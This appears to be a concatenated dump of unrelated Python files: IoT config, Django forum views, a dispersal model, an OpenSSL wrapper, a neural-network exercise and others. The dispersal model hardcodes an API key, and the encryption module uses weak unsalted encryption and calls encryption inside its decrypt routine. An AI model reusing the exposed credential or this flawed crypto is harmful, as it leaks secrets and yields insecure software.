+{"seq_id":"489298847","text":"broker_ip=\"34.123.208.229\"\nbroker_port=1883\ndb_name=\"test_database\"\npath_data_heating=\"temperature_in\"\ntopic_grzalka=\"grzalka_test\"\ntopic_grzalka2=\"grzalka_test2\"\ndic={\"on\":\"1\",\"off\":\"0\"}\npath_data_temperature=\"temperature_in\"\npath_data_wiatr_sila=\"./../../Data/WindS.csv\"\npath_data_wiatr_kierunek=\"./../../Data/WindD.csv\"\npath_data_entrance=\"./../../Data/Entrance.csv\"\ntopic ={ \"harmonogram_new\":\"harmonogram_new\",\n \"light_salon\":\"light_salon\",\n \"heating_switch\":\"heating_switch\",\n \"grzalka\":\"grzalka\",\n \"temperatura\":\"temperatura\"}\n\ncollections={\n \"temperature_in\":\"symulated_temp\"\n \n}","sub_path":"src/Configs/config_test_termostat_con.py","file_name":"config_test_termostat_con.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"525163051","text":"import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\n\ndef chip_image(img, chip_size=(300, 300)):\n \"\"\"\n Segment an image into NxWxH chips\n\n Args:\n img : Array of image to be chipped\n chip_size : A list of (width,height) dimensions for chips\n\n Outputs:\n An ndarray of shape (N,W,H,3) where N is the number of chips,\n W is the width per chip, and H is the height per chip.\n\n \"\"\"\n width, height, _ = img.shape\n wn, hn = chip_size\n images = np.zeros((int(width / wn) * int(height / hn), wn, hn, 3))\n k = 0\n for i in tqdm(range(int(width / wn))):\n for j in range(int(height / hn)):\n chip = img[wn * i:wn * (i + 1), hn * j:hn * (j + 1), :3]\n images[k] = chip\n\n k = k + 1\n\n return images.astype(np.uint8)\n\n\nif __name__ == \"__main__\":\n arr = np.array(Image.open(\"./Images/CF013540.jpg\"))\n chip_size = (300, 300)\n img = chip_image(arr, chip_size)\n print(img.shape)\n\n chipresult = \"./chipresult/\"\n for index in range(img.shape[0]):\n a = img[index]\n r = Image.fromarray(a[:, :, 0]).convert('L')\n g = Image.fromarray(a[:, :, 1]).convert('L')\n b = Image.fromarray(a[:, :, 2]).convert('L')\n image = Image.merge(\"RGB\", (r, g, b))\n image.save(chipresult + str(index) + \".jpg\", 'jpg')\n\n\n","sub_path":"src/semantic-segmentation/test/chip.py","file_name":"chip.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"557390362","text":"from django.shortcuts import render, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom multiprocessing import Process,Manager\nfrom operator import itemgetter\n\nimport pickle\n\n# homepage\ndef index(request):\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\ttopics = []\n\n\t# display top 20 with descending upvotes\n\t# use django's pagination to display the rest of the topics\n\tsorted_topics = sorted(topics, key=itemgetter('upvote'), reverse=True)\n\tpaginator = Paginator(sorted_topics, 20)\n\tpage = request.GET.get('page')\n\n\ttry:\n\t\tpg_topic = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tpg_topic = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tpg_topic = paginator.page(paginator.num_pages)\n\n\t# only dict is allowed to be passed to the template\n\treturn render(request, 'thread/index.html', {'topics' : pg_topic})\n\n# method for posting topic\ndef post(request):\n\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\ttopics = []\n\n\t# structure of topics consists of a list of dictionaries\n\t# each dict store the details of each topic, such as upvote, downvote, content, id\n\tif request.method == 'POST':\n\t\ttopic = {}\n\t\ttopic['id'] = len(topics)\n\t\ttopic['content'] = request.POST['post']\n\t\ttopic['upvote'] = 0\n\t\ttopic['downvote'] = 0\n\t\ttopics.append(topic)\n\n\t\t# save changes as pickled python list\n\t\tpickle.dump(topics, open('topics.pickle', 'wb'))\n\n\t# redirect back to homepage\n\treturn redirect('/thread/')\n\n# method for voting\ndef vote(request):\n\t# check if topics exist\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\t# just redirect to homepage if thread does not exist\n\t\treturn redirect('/thread/')\n\n\tif request.method == 'POST':\n\t\t# update topic based on id\n\t\ttopic_id = int(request.POST['id'])\n\n\t\t# distinguish between upvoting and downvoting\n\t\tif 'upvote' in request.POST:\n\t\t\ttopics[topic_id]['upvote'] += 1\n\t\telif 'downvote' in request.POST:\n\t\t\ttopics[topic_id]['downvote'] += 1\n\n\t\t# save changes as pickled python list\n\t\tpickle.dump(topics, open('topics.pickle', 'wb'))\n\n\t# redirect back to homepage\n\treturn redirect('/thread/')\n\n# not required for main functionalities\n# implemented for convenience to remove all the posts\ndef clear(request):\n\tpickle.dump([], open('topics.pickle', 'wb'))\n\treturn redirect('/thread/')","sub_path":"thread/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"536347279","text":"from django.shortcuts import render, HttpResponse\nfrom apps.hello.models import Contact, HttpRequestLog\nfrom apps.hello.forms import ContactForm\nfrom django.contrib.auth.decorators import login_required\nimport json\n\nimport datetime\n\nlogin_url = '/login/'\n\n\ndef hello(request):\n contact = Contact.objects.all()[0]\n age = int((datetime.date.today() - contact.date_of_birth).days / 365.25)\n return render(request, 'hello/index.html',\n {'contact': contact, 'age': age})\n\n\ndef http_requests(request):\n requests = HttpRequestLog.objects.all().order_by('-date')[:10]\n request.session['viewed_nmb'] = HttpRequestLog.objects.count()\n return render(request, 'hello/requests.html',\n {'requests': requests})\n\n\ndef ajax_request(request):\n response_data = {'total': HttpRequestLog.objects.count()}\n if 'viewed_nmb' in request.session:\n response_data['total'] -= request.session['viewed_nmb']\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n\n\n@login_required(login_url=login_url)\ndef edit_form(request):\n current_entry = Contact.objects.all()[0]\n if request.method == 'POST' and request.is_ajax():\n form = ContactForm(request.POST, request.FILES, instance=current_entry)\n if form.is_valid():\n form.save()\n return HttpResponse(json.dumps({'success': 'success'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'error': form.errors}))\n else:\n form = ContactForm(instance=current_entry)\n return render(request, 'hello/edit_form.html',\n {'form': form, 'entry': current_entry})\n","sub_path":"apps/hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"93343017","text":"from random import randint\n\ndef main():\n \"\"\"Guess the number!!\"\"\"\n\n #The correct answer cannot change every loop so it has to stay outside the loop\n correctNumber = randint(0, 100)\n guessNumber = input(\"What's your guess from 0 to 100, man?\\n\")\n \n #Gotta make sure we're giving an int alright\n try:\n GuessVal = int(guessNumber)\n except ValueError:\n print(\"That's not an int\")\n\n while(1):\n\n #So what'cha say? The main game loop\n if(GuessVal == correctNumber):\n print(\"Yay! , how'd you do that?\\n\") \n break\n \n elif(GuessVal > correctNumber):\n print(\"Not quite there, you wanna try something lesser?\\n\")\n GuessVal = int(input(\"What's your guess from 0 to 100, man?\\n\"))\n continue\n \n else:\n print(\"Try something bigger\\n\")\n GuessVal = int(input(\"What's your guess from 0 to 100, man?\\n\"))\n continue\n \nif __name__ == '__main__':\n main()","sub_path":"Knight Lab Projects/2.Guess Number.py","file_name":"2.Guess Number.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"244493853","text":"import subprocess\nimport key_store\nimport pdb\nimport os\n\n\ndef perform_encryption(messages: list, keystore_data, is_text_encryption: bool):\n\n messages = messages if isinstance(messages, list) else [messages]\n key = key_store.get_password(\n keystore_data.path, keystore_data.password, keystore_data.key_identifier\n )\n if is_text_encryption:\n return encrypt_text(messages, keystore_data.encryption_mode, key)\n else:\n return encrypt_files(messages, keystore_data.encryption_mode, key)\n\n\n# TODO: add -iv from devrandom\n# NEVER USE URANDOM\ndef encrypt_text(plaintexts: list, encryption_mode: str, key: str):\n\n ciphertexts = []\n\n for message in plaintexts:\n\n open_ssl_commands = [\"openssl\", \"enc\", f\"-{encryption_mode}\", \"-nosalt\"]\n\n if \"cbc\" in encryption_mode:\n with open(\"/dev/random\", \"rb\") as f:\n iv = f.read(16).hex()\n open_ssl_commands += [\"-K\", f\"{key}\", \"-iv\", f\"{iv}\"]\n else:\n open_ssl_commands += [\"-k\", f\"{key}\"]\n\n ciphertext = subprocess.check_output(open_ssl_commands, input=message)\n ciphertexts.append(ciphertext)\n\n return ciphertexts\n\n\ndef encrypt_files(\n file_paths: list, encryption_mode: str, key: str, challenge: bool = False\n):\n encrypted_paths = []\n\n if challenge:\n for path in file_paths:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n f\"-{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-iv\",\n f\"{os.urandom(16).hex()}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n f\"challenge.enc\",\n ]\n subprocess.check_output(open_ssl_commands)\n\n else:\n for path in file_paths:\n\n enc_path = f\"{path}.enc\"\n encrypted_paths.append(enc_path)\n\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n f\"-{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-iv\",\n f\"{os.urandom(16).hex()}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n enc_path,\n ]\n subprocess.check_output(open_ssl_commands)\n return encrypted_paths\n\n\n##### DECRYPTION #####\ndef perform_decryption(\n ciphertexts: list, keystore_data, encryption_mode: str, is_text_decryption: bool\n):\n\n ciphertexts = ciphertexts if isinstance(ciphertexts, list) else [ciphertexts]\n\n key = key_store.get_password(\n keystore_data.path, keystore_data.password, keystore_data.key_identifier\n )\n\n if is_text_decryption:\n encrypt_text(ciphertexts, encryption_mode, key)\n else:\n decrypt_files(ciphertexts, encryption_mode, key)\n\n\ndef decrypt_text(ciphertexts: list, encryption_mode: str, key: str) -> list:\n plaintexts = []\n\n for ciphertext in ciphertexts:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n \"-d\",\n f\"{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n ]\n plaintext = subprocess.check_output(open_ssl_commands, input=ciphertext)\n plaintexts.append(plaintext)\n\n return plaintexts\n\n\ndef decrypt_files(file_paths, encryption_mode, key):\n\n for path in file_paths:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n \"-d\",\n f\"{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n f\"{path}.dec\",\n ]\n output = subprocess.check_output(open_ssl_commands)\n","sub_path":"List_3/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640331184","text":"import numpy as np\nfrom data_utils import load_vocab\nimport constants\n\n\n# NLPLAB_W2V = 'data/w2v_model/wikipedia-pubmed-and-PMC-w2v.bin'\n# NLPLAB_W2V = 'data/w2v_model/BioWordVec_PubMed_MIMICIII_d200.vec.bin'\nNLPLAB_W2V = 'data/w2v_model/w2v_retrain.bin'\n\n\ndef export_trimmed_nlplab_vectors(vocab, trimmed_filename, dim=200, bin=NLPLAB_W2V):\n \"\"\"\n Saves glove vectors in numpy array\n\n Args:\n vocab: dictionary vocab[word] = index\n trimmed_filename: a path where to store a matrix in npy\n dim: (int) dimension of embeddings\n :param bin:\n \"\"\"\n # embeddings contains embedding for the pad_tok as well\n embeddings = np.zeros([len(vocab) + 1, dim])\n with open(bin, 'rb') as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n print('nlplab vocab size', vocab_size)\n binary_len = np.dtype('float32').itemsize * layer1_size\n\n count = 0\n m_size = len(vocab)\n for line in range(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == b' ':\n word = b''.join(word)\n break\n if ch != b'\\n':\n word.append(ch)\n word = word.decode(\"utf-8\")\n\n if word in vocab:\n count += 1\n embedding = np.fromstring(f.read(binary_len), dtype='float32')\n word_idx = vocab[word]\n embeddings[word_idx] = embedding\n else:\n f.read(binary_len)\n\n print('Missing rate {}'.format(1.0 * (m_size - count)/m_size))\n np.savez_compressed(trimmed_filename, embeddings=embeddings)\n\n\nvocab_words = load_vocab(constants.ALL_WORDS)\nexport_trimmed_nlplab_vectors(vocab_words, 'w2v_retrain_nlplab.npz')\n","sub_path":"data/w2v_model/trim_w2v.py","file_name":"trim_w2v.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"173865345","text":"'''\nCreated on Jun 12, 2014\n\n@author: CKenley\n'''\nimport logging\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nlogging.basicConfig(\n format=\"%(asctime)s : %(levelname)s : %(message)s\",\n filename=\"user.log\",\n level=logging.DEBUG\n )\n\n\ndef ProfileView(request):\n if 'user' in request.session:\n user = request.session['user']\n return render(request, \"user/profile.html\", {\"user\": user})\n errmsg = \"User could not be found in session!\"\n logging.error(errmsg)\n raise Http404(errmsg)\n","sub_path":"BTC/btc_wizard/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"126213086","text":"'''Crie um programa que tenha uma tupla totalmente preenchida com uma contagem por extenso, de zero até vinte. Seu\r\nprograma deverá ler um número pelo teclado (entre 0 e 20) e mostrá-lo por extenso.'''\r\n\r\nnums = ('zero', 'um', 'dois', 'tres', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',\r\n'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\r\n\r\nn = int(input('Digite um número de 0 a 20: '))\r\nwhile True:\r\n if n < 0 or n > 20:\r\n n = int(input('Valor digitado inválido. Digite um número de 0 a 20:'))\r\n else:\r\n break\r\nprint(nums[n])\r\n\r\nresp = input('Você quer que continue a contagem? [S/N] ').upper().strip()[0]\r\n\r\nwhile True:\r\n if resp != 'S' and resp != 'N':\r\n resp = input('Resposta inválida. Você quer que continue a contagem? [S/N] ').upper().strip()[0]\r\n\r\n if resp == 'S':\r\n if n != 20:\r\n n += 1\r\n print(nums[n])\r\n\r\n elif resp == 'N':\r\n break\r\n\r\nprint('Sequencia terminada.')\r\n","sub_path":"Ex072.py","file_name":"Ex072.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"489876372","text":"\nfrom __future__ import division\nimport os\nimport math\nimport json\nimport base64\nimport tempfile\nimport requests\nimport argparse\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D, axes3d\n\n\ndef stabilityclass_day(u,cloud,UV):\n if (cloud > 0.5): return 'D'\n if UV < 300:\n if (u<2): return 'B'\n if (2<=u<=5): return 'C'\n if (u>5): return 'D'\n elif 300 <= UV <= 600:\n if (u<2): return 'A'\n if 2<=u<5: return 'B'\n if 5<=u<=6: return 'C'\n if u>6: return 'D'\n elif UV > 600:\n if (u<3): return 'A'\n if (3<=u<=5): return 'B'\n if (u>5): return 'C'\n\ndef stabilityclass_night(u,cloud):\n if (cloud > 0.5): return 'D'\n if 0.355: return 'D'\n elif cloud<=0.35:\n if u<=3: return 'E'\n if u>3: return 'D'\n\ndef stabilityclass_latlon(lat,lon):\n ''' Calls an API to get weather data from location\n Returns stability class at day and night based on weather'''\n import json\n import requests\n # Gather weather parameters time='day'\n try:\n apikey='a6a267d35d8c445bbc4f74dca9543661'\n url='https://api.weatherbit.io/v2.0/current?lat={}&lon={}&key={}'.format(lat,lon,apikey)\n json_response = requests.get(url).json()\n except:\n raise Exception('API call was not possible')\n RH=json_response['data'][0]['rh']\n Irradiance=json_response['data'][0]['solar_rad']\n rain=json_response['data'][0]['precip']\n clouds=(json_response['data'][0]['clouds'])/100\n u=json_response['data'][0]['wind_spd']\n UV=json_response['data'][0]['uv']\n city=json_response['data'][0]['city_name']\n country=json_response['data'][0]['country_code']\n\n stabilityclasses={}\n stabilityclasses['Day']= stabilityclass_day(u,clouds,Irradiance)\n stabilityclasses['Night']= stabilityclass_night(u,clouds)\n\n return (stabilityclasses,u,RH,Irradiance,rain,clouds,UV,city, country)\n\ndef stabilityclass_input(u,cloud,UV):\n u=float(u) ; cloud=float(cloud)\n stabilityclasses={}\n stabilityclasses['Day']= stabilityclass_day(u,cloud,UV)\n stabilityclasses['Night']= stabilityclass_night(u,cloud)\n return stabilityclasses\n\n\n## Functions for printing the graph\n\ndef graph_2D(allXs,allYs,allCs,stabilityclass,u,time):\n matplotlib.use('agg')\n plt.scatter(allYs,allXs,c=allCs,cmap='nipy_spectral_r')\n cbar = plt.colorbar()\n cbar.set_label('Number of aeciospores deposited')\n plt.clim(0,5000)\n plt.xlabel('Horizontal plane (m)')\n plt.ylabel('Downwind of source distance (m)')\n plt.title('Stability class %s. Wind speed: %s m/s' % (stabilityclass,u))\n\n with tempfile.TemporaryFile(suffix=\".png\") as tmpfile:\n plt.savefig(tmpfile,format=\"png\")\n plt.clf()\n tmpfile.seek(0)\n return base64.b64encode(tmpfile.read())\n\n\ndef graph_3D(allXs,allYs,allZs,allCs, stability_class,u,time):\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n p = ax.scatter(allXs, allYs, allZs, zdir='z', s=20, c=allCs, cmap='nipy_spectral_r', depthshade=True)\n ax.legend()\n fig.colorbar(p)\n plt.ylabel('Cross-wind (m)')\n plt.xlabel('Distance (m)')\n plt.yticks([0,1,2])\n plt.title('Stability Class: %s. 
Wind: %s m/s' %(stability_class,u))\n plt.savefig('3D_%s_%s'% (city,time))\n\n\n\ndef calculateCs(stability_class,x,y,z,H,Q0,u,I,R, time):\n Vs=0.0113 # m/s 11.3 mm/s # Vd=1.27 # Vs=1.13 # urediniospores = 11.5 mm/s\n z=0\n stabilities={ #a b 10P q\n 'A': [0.28,0.9,0.527,0.865],\n 'B': [0.23,0.85,0.371,0.866],\n 'C': [0.22,0.8,0.209,0.897],\n 'D': [0.2,0.76,0.128,0.905],\n 'E': [0.15,0.73,0.098,0.902],\n 'F': [0.12,0.67,0.065,0.902],\n }\n # h=0.7\n hd=0.2\n z0=0.13*hd #0.029\n kz0= (10*z0)**(0.53*(x**-0.22))\n d=0.56*hd\n a = stabilities[stability_class][0]\n b = stabilities[stability_class][1]\n p = stabilities[stability_class][2]\n q = stabilities[stability_class][3]\n sigy=kz0*p*(x**q)\n sigz=kz0*a*(x**b)\n sig2y=sigy**2\n sig2z=sigz**2\n secondpart=math.exp(-(((H-z)**2)/(2*sig2z)))+math.exp(-(((H+z-2*d)**2)/(2*sig2z)))\n\n if time=='Day': Fs=math.exp(-(I*x)/5555*u) #5555*u) #18.01\n if time=='Night': Fs=1\n\n Yw=0.000272*(R**0.7873)\n Yd1=math.sqrt(2/math.pi)*(Vs/x)\n Y2a=((10*z0)**(0.53*(x**(-0.22))))*(x**(0.22-b+1))\n Y2b=math.log(10*z0)*(0.53*0.22)\n Yd2=Y2a*Y2b/a\n Yd=Yd1*Yd2\n\n Fd=math.exp((-(Yw+abs(Yd))*x)/u)\n Q=Q0*Fd*Fs\n\n C=(Q/u)*(math.exp((-y**2)/(2*sig2y))/(2*math.pi*sigz*sigy))*secondpart\n return C\n\n\ndef runmodel(graph,H,Q,u,I,R,clouds,stabilityclasses):\n xmax=100.02\n Xlist= np.arange(0.1,xmax,0.1) #Xlist= np.arange(0.001,20,0.001)\n Ylist=np.arange(-5,5,0.1) # Zlist=np.arange(0,H*2,0.1)\n z=0\n times=['Day','Night']\n maxdistances={}\n for time in times:\n allCs=[]\n allXs=[]\n allYs=[]\n for x in Xlist:\n for y in Ylist:\n stabilityclass=stabilityclasses[time]\n C=calculateCs(stabilityclass,x,y,z,H,Q,u,I,R,time)\n allCs.append(C)\n allYs.append(y)\n allXs.append(x)\n\n\n str_img=graph_2D(allXs,allYs,allCs,stabilityclass,u,time)\n\n Ccum = np.cumsum(allCs)\n max99=max(Ccum)*0.999\n max95=max(Ccum)*0.95\n max75=max(Ccum)*0.75\n max50=max(Ccum)*0.50\n\n X99 = round(allXs[[n for n,i in enumerate(Ccum) if i> max99][0]],1)\n X95 = round(allXs[[n for n,i in enumerate(Ccum) if i> max95][0]],1)\n X75 = round(allXs[[n for n,i in enumerate(Ccum) if i> max75][0]],1)\n X50 = round(allXs[[n for n,i in enumerate(Ccum) if i> max50][0]],1)\n\n valuesaty0=[]\n Xmax=\"more than 100\"\n for i,x in enumerate(allXs):\n if str(round(allYs[i],2))==\"-0.0\" or str(round(allYs[i],2))==\"0.0\":\n if allCs[i]<1 and x>X99:\n Xmax=round(x,2)\n break\n\n maxdistances[time]=[X95,X75,X50,X99,Xmax,str_img]\n return maxdistances\n","sub_path":"dispersal/GPModel/GPM_django_PF.py","file_name":"GPM_django_PF.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
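For orientation, calculateCs in the record above implements the standard Gaussian plume dispersion formula with a ground-reflection term offset by the displacement height d; in the code's notation (Q = Q0*Fd*Fs is the deposition- and survival-attenuated source strength, and the sigmas come from the stability-class coefficients) it reads:

    C(x, y, z) = \frac{Q}{2\pi u\, \sigma_y \sigma_z}
                 \exp\left(-\frac{y^2}{2\sigma_y^2}\right)
                 \left[\exp\left(-\frac{(H - z)^2}{2\sigma_z^2}\right)
                     + \exp\left(-\frac{(H + z - 2d)^2}{2\sigma_z^2}\right)\right],
    \qquad \sigma_y = k_{z0}\, p\, x^{q}, \quad \sigma_z = k_{z0}\, a\, x^{b}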
+{"seq_id":"401997026","text":"# 人工神经网络第四次作业1-2,异联想DHNN\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport copy\nfrom numpy import nan\nfrom typing import Optional\ndef data_loader(path): # 数据生成:获得全部数据\n with open(path,'r',encoding='UTF-8') as f:\n data = []\n for line in f:\n d = [int(j) for j in line.strip()]\n data.append(d)\n return np.array(data)\ndef visualize(W,title,xlabel,ylabel,path): # 可视化\n plt.clf()\n for i,w in enumerate(W):\n cols,rows = np.where(w.reshape(7,5) != nan)\n plt.subplot(2,4,i+1)\n ax = plt.gca() # 获取到当前坐标轴信息\n ax.xaxis.set_ticks_position('top') # 将X坐标轴移到上面\n ax.invert_yaxis() # 翻转y轴\n plt.margins(0.1)\n plt.scatter(rows,cols,s=w*100,alpha=0.8,c=np.random.RandomState(0).rand(len(rows)),cmap='Dark2') # 绘制字符点\n plt.grid(visible=False) # 不显示网格线\n plt.draw()\n plt.tight_layout() # 自适应调整子图大小\n plt.savefig(path) # 保存图像\ndef bam(W,x,y_last): # X状态更新\n \"\"\"\n input : W: connnection weight; x: flattrend letter vector, \n output: y: predection for x; x_new: updated x; ee: energy\n \"\"\"\n y = np.sign(x @ W) # 1x3\n y[np.where(y==0)] = y_last[np.where(y==0)]\n x_new = np.sign(y @ W.T) # 1x35\n x_new[np.where(x_new==0)] = x[np.where(x_new==0)]\n return x_new,y\ndef cal_energy(W,x,y): # 计算当前的能量函数值\n return -((x @ W) @ y)\ndef addnoise(c,noise_ratio = 0.1): # 按一定比例增加噪声\n noisenum = int(len(c) * noise_ratio)\n noisepos = [1]*len(c)\n noisepos[:noisenum] = [-1]*noisenum\n np.random.shuffle(noisepos)\n cc = np.array([x*y for x,y in zip(c,noisepos)])\n return cc\ndef showChar(c,offsetx,offsety,height,weight): # 单个字符绘制函数\n cc = list(zip(*([iter(c)]*weight)))\n x = [] # 非字符点\n y = []\n X = [] # 字符点\n Y = []\n for id,a in enumerate(cc):\n YY = offsety + height - id\n for iidd,b in enumerate(a):\n XX = offsetx + iidd\n if b == 0:\n x.append(XX)\n y.append(YY)\n else:\n X.append(XX)\n Y.append(YY)\n plt.scatter(x,y,s=50,alpha=1,marker='*') # 绘制非字符点\n plt.scatter(X,Y,s=500,alpha=0.8,c=np.random.RandomState(0).rand(len(X)),cmap='Dark2') # 绘制字符点\ndef calCharXY(id,height,weight): # 计算字符绘制坐标函数\n offsetx = id*height\n offsety = weight + 5\n if id >= 4:\n offsetx = (id-4)*height\n offsety = 0\n return offsetx,offsety\ndef savePltPic(title,xlabel,ylabel,path): # 我的标准保存图像函数\n font = {'family':'serif','style':'italic','weight':'bold','color':'black','size':20} # 设置标签字体\n plt.title(title,fontdict=font,fontsize=18) # 显示传递函数类型\n plt.xlabel(xlabel,fontdict=font,fontsize=15) # 设置x轴标签\n plt.ylabel(ylabel,fontdict=font,fontsize=15) # 设置y轴标签\n plt.grid(visible=False) # 不显示网格线\n plt.tight_layout() # 自适应调整子图大小\n plt.savefig(path) # 保存图像\n plt.close() # 关闭图像\nnp.random.seed(1) # 设置随机数种子\nplt.rcParams['figure.figsize'] = (12,8)\ndata_path = './DATA/char.txt' # 八字母数据集路径\nnumber_data = data_loader(data_path) # 读取八字母数据集\nCharStr = np.array(['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']) # 字母列表初始化,选择ZHUOQING一共8个字母\ntarget = np.array(['G','N','I','Q','O','U','H','Z'])\n# 生成训练数据和标签\nX = [] # 8x35\nY = [] # 8x3\nfor index,letter in enumerate(target):\n id_ = np.where(CharStr == letter)[0][0]\n X.append(number_data[id_])\n bi = bin(index).replace('0b','')\n la = np.array([int(i) for i in f'{bi:0>3}'])\n la[la == 0] = -1\n Y.append(la)\nif False: # 绘制八字母数据集\n for id,xx in enumerate(X):\n offsetx,offsety = calCharXY(id=id,height=7,weight=5) # 计算字符绘制坐标\n showChar(c=xx,offsetx=offsetx,offsety=offsety,height=7,weight=5) # 绘制单个字符\n savePltPic(title='Alphabet dataset',xlabel='x',ylabel='y',path='./OUTPUT/8number_char.jpg')\nX 
= np.array(X).astype('float32')*2-1 # 二进制(0,1)转换为双极性(-1,1)\nY = np.array(Y).astype('float32')\nw_matrix = X.T @ Y # 计算权系数矩阵W\nif False: # 绘制权系数矩阵\n plt.imshow(w_matrix)\n savePltPic(title='Weight coefficient matrix',xlabel='x',ylabel='y',path='./OUTPUT/8number_w.jpg')\nenergy = np.zeros(8) # 计算能量函数\nfor i in range(8):\n energy[i] = cal_energy(w_matrix,X[i],Y[i])\n# print(f'Energy: {energy}')\n# # 从噪声数据中还原到对应的标签\n# timeNum = 2\n# # plt.draw()\n# # plt.pause(0.2)\n# for noi in range(4): # 4种加噪声的结果\n# # 生成加噪声数据X_noise\n# X_noise = np.zeros(X.shape)\n# for i,x in enumerate(X):\n# X_noise[i] = addnoise(x,0.2) \n# # 保留原始数据,在X_copy上更新状\n# X_copy = X_noise.copy()\n# # visualize(X_copy,f'./OUTPUT/8number{noi}.png')\n# # 还原到对应的标签\n# for j,x in enumerate(X_noise): # 由于更新的是状态,权值不变,那么<对所有样本迭代一遍再重复time次>和<逐个对单个样本迭代time次> 一样\n# y = np.sign(x @ w_matrix)\n# for _ in range(timeNum): # 迭代次数\n# ee = cal_energy(w_matrix,x,y)\n# x,y = bam(w_matrix,x,y)\n# X_copy[j] = x\n# print(y,Y[j],(y==Y[j]).all()) \n# print('----------------------------------------')\n# # visualize(X_copy,f'./OUTPUT/v{noi}.png')","sub_path":"NeuralModel/ANN27.py","file_name":"ANN27.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"21979046","text":"from dictionaries.exe_1 import *\ndicSum=create_dic()\nprint(dicSum)\nkey = int(input(\"enter wanted key\"))\nfor i in dicSum.keys():\n print(i)\n if i==key:\n print(\"yes\")\n break\n else:\n print(\"no\")\ncreate_dic()","sub_path":"dictionaries/exe_2.py","file_name":"exe_2.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"362350392","text":"\"\"\"\n For models: model_v1_x.py\n\"\"\"\n\nimport os\nimport time\nimport sys\nimport shutil\nimport random\nfrom time import strftime\nfrom argparse import ArgumentParser\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torch.nn.functional as F\ntorch.multiprocessing.set_sharing_strategy('file_system')\nfrom PIL import Image\nfrom subprocess import call\nfrom sapien_data import PartNetSapienDataset\nimport utils\nfrom geometry_utils import render_pts\nimport sapien.core as sapien\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport logging\nlogger = logging.getLogger(\"trimesh\")\nlogger.setLevel(logging.ERROR)\n\n\ndef train(conf):\n # create training and validation datasets and data loaders\n data_features = ['pc', 'shape_id']\n\n train_dataset = PartNetSapienDataset(train=True)\n utils.printout(conf.flog, str(train_dataset))\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=conf.batch_size, shuffle=True, pin_memory=True, \\\n num_workers=conf.num_workers, drop_last=True, collate_fn=utils.collate_feats, worker_init_fn=utils.worker_init_fn)\n\n val_dataset = PartNetSapienDataset(train=False)\n utils.printout(conf.flog, str(val_dataset))\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=conf.batch_size, shuffle=False, pin_memory=True, \\\n 